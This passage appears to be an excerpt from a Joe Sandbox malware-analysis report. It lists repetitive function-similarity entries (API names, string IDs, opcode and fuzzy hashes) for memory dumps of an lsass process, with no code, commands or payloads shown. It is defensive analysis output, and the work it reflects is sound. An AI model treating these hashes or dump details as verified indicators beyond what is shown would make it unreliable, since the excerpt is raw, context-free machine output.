                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: 549d6b3f5c5617265924b4db8807741ab2b98ea511b45a10dbd99b22b46e9c1f
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: F1F08CB4708F8982EA148B13B914199A670BF48FC0F4C8430EE4E07B1ADE6CC4C78780
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: c7a77935cd3ff50cc22bbf61a466c25b5755c83e5add7d4d4005042facc3e205
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 18F09071208F4981EB108B24F8843A96330EF89760F5C0219DA7E455E6CF3CC4CAC7C0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: 8125674789d92a5479a628aecd600cb6081226b1809075a8aed29d4977de2a50
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction Fuzzy Hash: F202B63221DB8886EB61CF55F4903AAB7B0F785794F140015EA8E87BA9DBBCD495CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: 8766a97f31f53a2c0922cdae98632e9cd144d5ee2a52e1ef2e78a76bd73733b5
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 60518335608F0587E764CB16F84079AB7B0FB84B84F5881199E4E43756DF78C98BCB80
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: 954548f2d2f2eb1727b34777494260f77ffc5ea29933f4fc2f9ab99450d76c11
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 23516335218B498BE724CF16B84079AB7B1FB84B84F584119DE4E4375ADF78D98BCB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: a0d3d935ebb2149f436fe8553ea03842cde1fcc6533f6d8c8d18eb5ce2a62dd7
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: 3E61B63612DB8886E761CF15F4543AAB7B0F788744F540115FA8D87BAADBBCD586CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 7a4681845d68765c2fe651341d7c065f2c313b53bf4c6282e3f71e70ffd23cd5
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 5C114F36609B4493EB248B61F40429AA7B0FF45B80F080126DE8D037A9EF7DC9DAC7C4
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 875f8e91b8ec60e369ef0c0a4fa31e9cbd0d42de610c1aa331d7fb3e193f8215
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 1351CF32359F08CAEB58CB55F444BAC37B1EB54B98F188121DA5E4778ADBB9C8D2C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: d9f36c28b8368ba67f33a76669638aa3bbfff7f91a8384785df6904ca07c6f67
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: A1617C3250CBC885EB208B15F4407DABBB0FB95B98F485215EB9C17B96DBB8D1D6CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 611d291301d54a95b7270af50630b4b285e2c5ae5dac77d113480ec9eb855077
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 6951C13610CB988BEB748F12A5443A877B0FB50B84F1C6116DA9D47BD2CBB8E4E6C741
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000003.1604607101.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_3_17d2dd20000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 9924569a5ab876b337d3d8800d55b27160b79a26f432793cf3b9df684b44e794
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 7251803218CB488AEB748F11A68839877B0FB55B94F1C5116DA9D47B9FCB38C4D6CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 3339c7917aa704551e98117c40d034c359a0e0c72837dcb32f0ec74c5693b7a9
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: DB115431318F8592EB209B35F8003DA66B4FF44781F9845259E8D83696EFA9C9C7C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 3298a726dc5465890309b67df4462229f4f7f8e3e357887ff85e25c4a6c59ccf
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: B4D19B32718B4889E711CFA5E4407EC3BB5EB55B98F888216DE5D97B9ADA34C186C380
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 0f95c1dffc8255ab5602c6e5a498ab9dff0cbe01a932d44c9348a9f5b6c20eba
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 98011332619F98DAE714DF66B80428977B1FB89F80B094025DB4D53729DE38D4D2C780
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000017D2DD628DF), ref: 0000017D2DD62A12
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: aa166f6266bb96c49c0b0f95c8e07a40ccaf4e3586e99a536f9aed07c311213a
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: 6A91B132618B5999FB608F65B4503ED2BB0FB55B98F4C9106DE4E67A8ADA34C4C7C3C0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 4157c9474ce7d2e752517023a27d0e78ade98282bef4b994be3812213f498eb2
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: 2E113036754F088AEB00CF60F8543E833B4FB19758F880E21EA6D867A5DF78C1968380
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000003.1604607101.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_3_17d2dd20000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3242871069-1018135373
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000003.1604607101.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_3_17d2dd20000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  APIs
                                                  Memory Dump Source
